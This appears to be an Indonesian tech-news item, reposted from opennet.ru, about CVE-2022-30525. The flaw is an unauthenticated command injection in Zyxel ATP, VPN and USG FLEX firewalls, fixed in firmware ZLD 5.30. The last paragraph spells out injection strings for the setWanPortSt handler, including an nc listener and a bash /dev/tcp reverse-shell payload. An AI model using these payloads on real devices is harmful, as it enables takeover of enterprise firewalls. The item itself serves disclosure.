Kerentanan di firewall Zyxel yang memungkinkan eksekusi kode tanpa otentikasi

Kerentanan kritis (CVE-2022-30525) telah diidentifikasi pada perangkat Zyxel dari seri ATP, VPN, dan USG FLEX, yang dirancang untuk mengatur pengoperasian firewall, IDS, dan VPN di perusahaan, yang memungkinkan penyerang eksternal mengeksekusi kode pada perangkat tanpa hak pengguna tanpa otentikasi. Untuk melakukan serangan, penyerang harus dapat mengirimkan permintaan ke perangkat menggunakan protokol HTTP/HTTPS. Zyxel telah memperbaiki kerentanan pada pembaruan firmware ZLD 5.30. Menurut layanan Shodan, saat ini terdapat 16213 perangkat yang berpotensi rentan di jaringan global yang menerima permintaan melalui HTTP/HTTPS.

Pengoperasian dilakukan dengan mengirimkan perintah yang dirancang khusus ke web handler /ztp/cgi-bin/handler, dapat diakses tanpa otentikasi. Masalah ini disebabkan oleh kurangnya pembersihan parameter permintaan saat menjalankan perintah pada sistem menggunakan panggilan os.system yang digunakan di perpustakaan lib_wan_settings.py dan dijalankan saat memproses operasi setWanPortSt.

Misalnya, penyerang dapat meneruskan string “; ping 192.168.1.210;" yang akan mengarah pada eksekusi perintah “ping 192.168.1.210” pada sistem. Untuk mendapatkan akses ke shell perintah, Anda dapat menjalankan “nc -lvnp 1270” di sistem Anda, dan kemudian memulai koneksi terbalik dengan mengirimkan permintaan ke perangkat dengan '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Sumber: opennet.ru

Tambah komentar